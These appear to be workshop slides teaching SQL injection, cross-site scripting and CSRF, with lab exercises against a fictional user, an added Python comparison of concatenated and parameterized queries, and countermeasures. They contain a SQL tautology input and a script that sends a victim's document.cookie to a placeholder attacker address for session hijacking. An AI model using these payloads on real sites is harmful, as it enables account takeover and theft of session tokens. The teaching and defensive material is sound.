29. SQL Injection
SQL injection is a web security vulnerability that allows an
attacker to interfere with the queries that an application makes
to its database.
33. Hands On!
Poppy has changed his password to
something big.
Hack into Poppy’s account using SQL
Injection.
35. 1. Escape the input, i.e. ' becomes \'
So, SELECT data FROM table where user='poppy' and
password='a\' 1=1'
2. Use prepared statements, i.e.
SELECT data FROM table where user=[1] and password=[2]
[1] = poppy
[2] = a' 1=1
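The two forms from this slide side by side, as an added example that is not part of the original slides: a query built by string concatenation next to the same query with placeholders, run against an in-memory SQLite database. The table name accounts, its columns, the stored password and the second test input are constructed for the example.

```python
import sqlite3

def make_db():
    # Constructed sample data; table name "accounts" and its columns are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (user TEXT, password TEXT, data TEXT)")
    db.execute("INSERT INTO accounts VALUES "
               "('poppy', 'something-big', 'poppy-private-data')")
    return db

def lookup_concatenated(db, user, password):
    """Vulnerable form: the input becomes part of the SQL text and is parsed as SQL."""
    sql = ("SELECT data FROM accounts WHERE user='" + user +
           "' AND password='" + password + "'")
    try:
        return db.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # The quote in the input ended the string literal and broke the statement.
        return "syntax error: %s" % exc

def lookup_prepared(db, user, password):
    """Hardened form: the ? placeholders play the role of [1] and [2] on the slide."""
    sql = "SELECT data FROM accounts WHERE user=? AND password=?"
    return db.execute(sql, (user, password)).fetchall()

def demo():
    db = make_db()
    slide_input = "a' 1=1"        # the input shown on the slide
    tautology = "a' OR '1'='1"    # constructed test input for this lab database
    return {
        "concat_slide": lookup_concatenated(db, "poppy", slide_input),
        "concat_tautology": lookup_concatenated(db, "poppy", tautology),
        "prepared_slide": lookup_prepared(db, "poppy", slide_input),
        "prepared_tautology": lookup_prepared(db, "poppy", tautology),
        "prepared_real": lookup_prepared(db, "poppy", "something-big"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

With concatenation the same input either breaks the statement or changes its WHERE clause; with placeholders both inputs are compared as plain password strings and match nothing.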
36. XSS: Cross Site Scripting
XSS enables attackers to inject client-side scripts
(javascript) into web pages viewed by other
users.
Can be used to capture session tokens.
39. Hands On !
● Turn on your server. LINK
● Inject the code
<img src="" id="payload" />
<script>
document.getElementById("payload").src="http://YOUR_IP:1338/xss_server.py?"+document.cookie;
</script>
● Wait for Poppy to access your share link.
● Log in to Poppy’s account with his token.
41. Countermeasures
● Escape HTML strings, i.e. > becomes &gt;
● Check carefully what and where you
are inserting input data.
● Use HttpOnly Cookies
42. CSRF: Cross Site Request Forgery
Cross-Site Request Forgery (CSRF) is
an attack that forces an end user to
execute unwanted actions on a web
application in which they're currently
authenticated.